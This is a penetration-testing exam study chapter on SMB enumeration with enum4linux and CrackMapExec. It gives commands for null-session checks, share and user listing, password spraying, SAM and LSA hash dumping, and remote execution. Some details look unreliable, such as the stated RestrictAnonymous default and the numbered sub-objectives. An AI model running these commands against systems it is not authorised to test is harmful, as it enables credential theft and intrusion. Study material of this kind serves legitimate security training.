This chapter covers SMB enumeration using two essential tools for the PT0-002 exam: enum4linux and CrackMapExec. SMB enumeration is a core reconnaissance technique used to extract user lists, share information, and system details from Windows environments. Approximately 5-10% of exam questions touch on SMB enumeration, often in the context of identifying misconfigurations or leveraging null sessions. Mastering these tools is critical for the Reconnaissance and Enumeration domain (Objective 2.2).
Jump to a section
Imagine you are a private investigator trying to gather information about a large hotel. The hotel has a front desk that maintains a guest directory. You cannot just walk in and demand a list of all guests, but you can ask specific questions. SMB enumeration tools like enum4linux and CrackMapExec work similarly. The hotel's front desk (the SMB service) will answer queries if you ask in the right way. enum4linux is like a patient investigator who systematically asks for the guest list (users), the staff directory (groups), the room service menu (shares), and other details. It uses standard polite requests (null sessions) that the front desk might honor if not properly secured. CrackMapExec is more aggressive—it not only asks for the directory but also tries to unlock doors (authenticate) with common keys (password spraying) and then checks what each unlocked room contains (share access, remote execution). Just as a hotel might restrict access to its guest directory, modern Windows configurations disable null sessions, but many legacy systems still leak this information. Understanding how these tools query the SMB service is essential for a penetration tester to map the network and identify misconfigurations.
What is SMB Enumeration?
Server Message Block (SMB) is a network file sharing protocol used primarily by Windows systems. It allows applications to read, write, and request services from network resources. SMB operates over TCP port 445 (direct SMB) or port 139 (NetBIOS over TCP). The protocol has evolved through several versions: SMBv1 (legacy, insecure), SMBv2 (Windows Vista/2008), and SMBv3 (Windows 8/2012+). For enumeration, the most critical feature is the IPC$ share (Inter-Process Communication), which allows remote procedure calls (RPC) for querying system information.
Enumeration tools exploit the SMB protocol's ability to perform anonymous or authenticated queries. The key concept is the "null session" – an unauthenticated connection to the IPC$ share. In older Windows versions (pre-Windows 2003 SP1), null sessions were allowed by default, granting access to sensitive information. Modern systems restrict null sessions, but many misconfigurations or legacy servers still permit them.
How enum4linux Works
enum4linux is a Perl script that wraps several SMB enumeration tools, primarily nmblookup, net, rpcclient, and smbclient. It automates the process of extracting information from Windows systems via SMB.
Key Functions:
- User Enumeration: Uses rpcclient commands like enumdomusers and queryuser to list domain users.
- Group Enumeration: Lists local and domain groups via enumdomgroups.
- Share Enumeration: Lists all available SMB shares, including hidden ones (ending with $).
- Password Policy Retrieval: Uses getdompwinfo to extract password policy details.
- OS Information: Identifies the operating system version via SMB negotiation.
Syntax:
enum4linux [options] <target_ip>Common options:
- -U: Enumerate users
- -S: Enumerate shares
- -P: Enumerate password policy
- -G: Enumerate groups
- -a: Do all simple enumeration (equivalent to -U -S -G -P -r -o -n -i)
Example:
enum4linux -a 192.168.1.10This performs a comprehensive enumeration against the target. The script first checks for null session availability. If a null session is allowed, it proceeds to query users, groups, shares, and more. If not, it may still gather limited information from SMB fingerprinting.
How CrackMapExec Works
CrackMapExec (CME) is a more advanced post-exploitation tool that performs SMB enumeration, authentication attacks, and lateral movement. It is written in Python and designed for speed and modularity.
Key Features: - Authentication Testing: Tests credentials via SMB, including password spraying and brute-force. - Share Enumeration: Lists accessible shares and their contents. - Remote Execution: Executes commands on target systems via SMB (using PsExec or WMI). - Local Admin Check: Determines if the provided credentials have local administrator access. - Dumping Credentials: Extracts hashes from SAM database or LSASS memory.
Syntax:
crackmapexec <protocol> <target(s)> [options]For SMB:
crackmapexec smb <target_ip> -u <username> -p <password>Common Options:
- -u: Username (or file of usernames)
- -p: Password (or file of passwords)
- --shares: Enumerate shares
- --users: Enumerate users
- --groups: Enumerate groups
- -x: Execute a command via SMB
- --sam: Dump SAM hashes
- --lsa: Dump LSA secrets
Example - Enumeration:
crackmapexec smb 192.168.1.10 -u 'guest' -p '' --sharesThis attempts to authenticate as guest with an empty password and enumerate shares.
Example - Password Spraying:
crackmapexec smb 192.168.1.10-20 -u users.txt -p 'Spring2024!' --continue-on-successThis sprays the password 'Spring2024!' against all users in users.txt across multiple targets.
Null Sessions and Their Role
A null session is an unauthenticated connection to the IPC$ share. The IPC$ share is a special hidden share used for inter-process communication. It allows remote procedure calls (RPC) for administrative functions.
How Null Sessions Work:
1. The client connects to the IPC$ share using an empty username and password.
2. If the server allows null sessions, the client gains access to certain RPC services.
3. The client can then call functions like NetUserEnum, NetShareEnum, NetServerGetInfo, etc.
Default Behavior: - Windows NT 4.0, 2000: Null sessions allowed by default. - Windows XP, 2003: Null sessions allowed but restricted. - Windows Vista, 7, 8, 10, Server 2008, 2012, 2016, 2019: Null sessions disabled by default.
Restriction Mechanism:
The registry key HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymous controls null session access:
Value 0: No restriction (allows null sessions).
Value 1: Restricts enumeration but allows other RPC calls.
Value 2: No null sessions allowed (except for specific exceptions like named pipes).
Modern systems set RestrictAnonymous to 2 by default, but older systems or misconfigured machines may have lower values.
Enumeration Techniques in Detail
User Enumeration:
- enum4linux uses rpcclient with enumdomusers to list users.
- CME uses the --users option which queries the SAM database or domain controller.
- The output includes usernames, which can be used for password spraying.
Share Enumeration: - Both tools list all shares, including hidden administrative shares like C$, ADMIN$, IPC$. - Accessible shares may contain sensitive files. - CME can recursively list files in shares.
Password Policy Retrieval:
- enum4linux uses getdompwinfo to retrieve password policy.
- Important fields: minimum password length, lockout threshold, lockout duration.
- This information helps tailor brute-force attacks.
OS Fingerprinting: - SMB version negotiation reveals the OS version. - enum4linux shows the OS string (e.g., "Windows 10 Pro 19041"). - CME displays the OS version in its output.
Interaction with Related Technologies
SMB enumeration often leads to other attack vectors: - PsExec: Once credentials are obtained, CME can execute commands via PsExec. - WMI: CME can use WMI for remote execution. - Pass-the-Hash: Extracted NTLM hashes can be used with tools like Impacket. - Kerberos: In domain environments, SMB enumeration can reveal domain controllers and trust relationships.
Practical Usage Tips for PT0-002
Always check for null sessions first with enum4linux -a. If it works, you have a goldmine of information.
Use CME for faster enumeration and authentication testing across multiple targets.
Combine both tools: enum4linux for initial recon, CME for exploitation.
Be aware of logging: SMB enumeration generates Event IDs like 4625 (failed logon) and 5140 (share access).
In the exam, you may be given a scenario where null sessions are disabled; look for alternative methods like guest accounts or default credentials.
Common Pitfalls
Assuming null sessions always work: many modern systems block them.
Forgetting to specify the correct protocol: CME defaults to SMB, but you can specify smb explicitly.
Not using the --continue-on-success flag during password spraying, which stops after the first success.
Misinterpreting CME output: a "Pwn3d!" message indicates local admin access, not just successful authentication.
Identify SMB Services on Target
Use Nmap to scan for open SMB ports (139 and 445). For example: `nmap -p139,445 192.168.1.0/24`. This identifies systems running SMB. Note the OS detection may be enabled with `-O`. In the exam, you may be given a target IP; verify that SMB is listening. If port 445 is open, direct SMB is available; if only 139, NetBIOS session service is used. This step is crucial because enumeration tools require a live SMB service.
Perform Null Session Check with enum4linux
Run `enum4linux -a <target_ip>` to attempt a null session. The script will try to connect to IPC$ with empty credentials. If successful, it will enumerate users, groups, shares, password policy, and OS information. Watch for errors like "NT_STATUS_ACCESS_DENIED" which indicates null sessions are disabled. If null sessions work, collect all output for later use. This step directly tests the RestrictAnonymous setting.
Enumerate Users and Groups with rpcclient
If null session works, use rpcclient manually for deeper enumeration. Connect with `rpcclient -U '' -N <target_ip>`. Then run commands: `enumdomusers` to list users, `enumdomgroups` for groups, and `queryuser <rid>` for details. The RID (Relative Identifier) is a numeric identifier for each user. This manual approach may reveal information that enum4linux misses, such as last logon times or account flags. If null session fails, you may need credentials.
Enumerate Shares with smbclient
Use `smbclient -L //<target_ip> -N` to list shares anonymously. This command attempts to list all shares, including hidden ones. If successful, you'll see shares like C$, ADMIN$, IPC$, and any custom shares. Accessible shares can be explored with `smbclient //<target_ip>/<share> -N`. In the exam, you might find a share containing sensitive files like passwords.txt. If anonymous access fails, try with credentials obtained from other steps.
Use CrackMapExec for Authenticated Enumeration
Once you have credentials (e.g., from password spraying or previous compromise), use CME for comprehensive enumeration. Run `crackmapexec smb <target_ip> -u <user> -p <pass> --shares --users --groups`. CME will test authentication and then enumerate shares, users, and groups. The output shows accessible shares and their contents. Use `--sam` to dump local SAM hashes if you have admin privileges. CME's speed allows scanning multiple targets quickly.
In enterprise environments, SMB enumeration is a critical phase of penetration testing. Consider a scenario where a company has a mix of legacy Windows Server 2003 systems and modern Windows Server 2019 servers. The legacy servers often have null sessions enabled by default because they were never hardened. A penetration tester can use enum4linux to extract a full user list from the domain controller running Server 2003. This user list then feeds into a password spraying attack using CrackMapExec against all domain systems. The password spraying uses a common password like 'Company123!' and targets all users. CME quickly identifies which accounts are vulnerable and whether any have local admin rights on specific machines. The tester then uses CME's remote execution feature (PsExec) to execute a reverse shell on a machine where an admin account is compromised, gaining a foothold.
Another scenario involves a network segmentation assessment. The tester is given a low-privilege domain account. Using CME, they enumerate all accessible SMB shares across the network. They discover a file server share with 'Everyone' read access containing payroll data. This misconfiguration violates the principle of least privilege. The tester documents the share permissions and contents for the report.
A common misconfiguration that goes wrong is when administrators disable SMBv1 but forget to restrict null sessions on the IPC$ share. This leaves the system vulnerable to information disclosure. Another issue is when service accounts have weak passwords and are members of the local administrators group. CME's password spraying often finds these accounts. In production, performance considerations include network latency and the number of concurrent connections. CME can be throttled with the --timeout option to avoid overwhelming the target or triggering intrusion detection systems.
The PT0-002 exam tests SMB enumeration primarily under Objective 2.2 (Reconnaissance and Enumeration). Specific sub-objectives include: 2.2.1 (Enumerate hosts, services, and vulnerabilities), 2.2.2 (Enumerate users and groups), and 2.2.3 (Enumerate network shares). Expect 2-4 questions on SMB enumeration, often scenario-based.
Common Wrong Answers:
1. Choosing FTP instead of SMB: If a question asks about enumerating Windows users, FTP is incorrect because it does not provide user enumeration via null sessions.
2. Using SNMP for user enumeration: SNMP can reveal system information but not detailed user lists like SMB RPC calls.
3. Assuming null sessions always work: Many candidates select options that rely on null sessions without checking the OS version. The exam may specify a modern Windows system where null sessions are blocked.
4. Confusing enum4linux with nmap scripts: The smb-enum-users NSE script can also enumerate users, but enum4linux is more comprehensive and specific to the exam.
Specific Numbers and Values: - Ports: 139 (NetBIOS) and 445 (direct SMB). - RestrictAnonymous registry values: 0 (no restriction), 1 (restrict enumeration), 2 (no null sessions). - Common SMB versions: SMBv1 (insecure), SMBv2, SMBv3. - CME output: "Pwn3d!" indicates admin access.
Edge Cases:
- SMB signing: If SMB signing is enabled, some tools may fail. The exam may ask about signing requirements.
- Guest account: If the guest account is enabled without a password, CME can authenticate with -u 'guest' -p ''.
- Domain vs local accounts: CME can enumerate domain users if the target is a domain controller.
Eliminating Wrong Answers: - If the question asks for user enumeration on a modern Windows system, eliminate any option that relies on anonymous access. - If the question mentions "password policy enumeration", the correct tool is enum4linux or rpcclient, not nmap. - Look for keywords like "null session", "IPC$", or "RestrictAnonymous" to guide your answer.
SMB enumeration targets ports 139 and 445.
Null sessions allow unauthenticated enumeration if RestrictAnonymous is 0 or 1.
enum4linux automates RPC calls for user, group, share, and policy enumeration.
CrackMapExec performs authentication testing, share enumeration, and remote execution.
CME output 'Pwn3d!' indicates local admin access via SMB.
Password spraying with CME uses the --continue-on-success flag to avoid stopping at first success.
SMBv1 is deprecated and often disabled; modern systems use SMBv2 or SMBv3.
The IPC$ share is the entry point for null sessions.
Guest accounts with no password can be used for enumeration if enabled.
Always check for null sessions first with enum4linux -a before attempting authenticated enumeration.
These come up on the exam all the time. Here's how to tell them apart.
enum4linux
Primarily uses null sessions and RPC calls
Written in Perl, slower but thorough
Outputs user, group, share, and policy info
No built-in password spraying or remote execution
Best for initial recon on legacy systems
CrackMapExec
Supports authenticated enumeration and attacks
Written in Python, fast and modular
Can execute commands, dump hashes, and spray passwords
Includes password spraying and brute-force modules
Best for post-exploitation and lateral movement
Mistake
Null sessions are always available on Windows systems.
Correct
Modern Windows systems (Vista and later) disable null sessions by default via the RestrictAnonymous registry key set to 2. Only legacy systems or misconfigured machines allow null sessions.
Mistake
enum4linux and CrackMapExec do the same thing.
Correct
enum4linux focuses on information gathering via null sessions and RPC calls. CrackMapExec is a more comprehensive tool for authentication testing, share enumeration, and remote execution. They complement each other.
Mistake
SMB enumeration only works on port 445.
Correct
SMB can also operate over port 139 (NetBIOS session service). enum4linux uses both ports depending on the target. Port 445 is preferred for direct SMB, but port 139 is still common on older systems.
Mistake
CrackMapExec can only be used with valid credentials.
Correct
CME can also attempt null sessions or guest authentication. For example, `crackmapexec smb <target> -u '' -p ''` tries an anonymous connection. However, success depends on the target's configuration.
Mistake
Enumerating shares always requires admin privileges.
Correct
Many shares are configured with read access for Everyone or Authenticated Users. Even a low-privilege user can list share contents if permissions are loose. CME's share enumeration works with any valid credentials.
Reveal each answer, then mark whether you got it right. Score 60%+ to unlock the next chapter.
A null session is an unauthenticated connection to the IPC$ share. To test for it, use `enum4linux -a <target_ip>` or `rpcclient -U '' -N <target_ip>`. If the connection succeeds, null sessions are enabled. The RestrictAnonymous registry key controls this: value 0 allows full access, 1 restricts enumeration, 2 blocks null sessions. Modern Windows systems default to 2.
Use `crackmapexec smb <target> -u <user> -p <pass> --users`. This queries the SAM database or domain controller for user accounts. For anonymous enumeration, use `-u '' -p ''` but success depends on null session availability. CME also supports user enumeration via RID cycling with the `--rid-brute` option.
enum4linux is a wrapper for legacy tools like rpcclient and smbclient, focusing on information gathering via null sessions. CrackMapExec is a modern, multi-protocol tool that performs authentication attacks, share enumeration, and remote execution. For PT0-002, enum4linux is used for initial recon, while CME is used for deeper exploitation.
Yes, CME has a built-in password spraying module. Use `crackmapexec smb <target> -u users.txt -p passwords.txt --continue-on-success`. The `--continue-on-success` flag ensures it continues after a successful login. CME will report which credentials worked and whether the account has local admin privileges.
When CME outputs 'Pwn3d!' next to a target, it means the provided credentials have local administrator access on that machine. This is a high-value finding, as it allows full control over the system, including remote code execution and credential dumping via SAM or LSASS.
Use `smbclient -L //<target_ip> -N` for anonymous listing, or `smbclient -L //<target_ip> -U <user>%<pass>` for authenticated. This lists all shares including hidden ones (ending with $). To access a share, use `smbclient //<target_ip>/<share> -U <user>%<pass>`. You can then browse files with FTP-like commands (ls, get, put).
The key is `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymous`. Values: 0 (no restriction), 1 (restrict enumeration), 2 (no null sessions). Modern Windows sets it to 2. The exam may ask about this key or its effect on SMB enumeration.
You've just covered SMB Enumeration with enum4linux and CrackMapExec — now see how well it sticks with free PT0-002 practice questions. Full explanations included, no account needed.
Done with this chapter?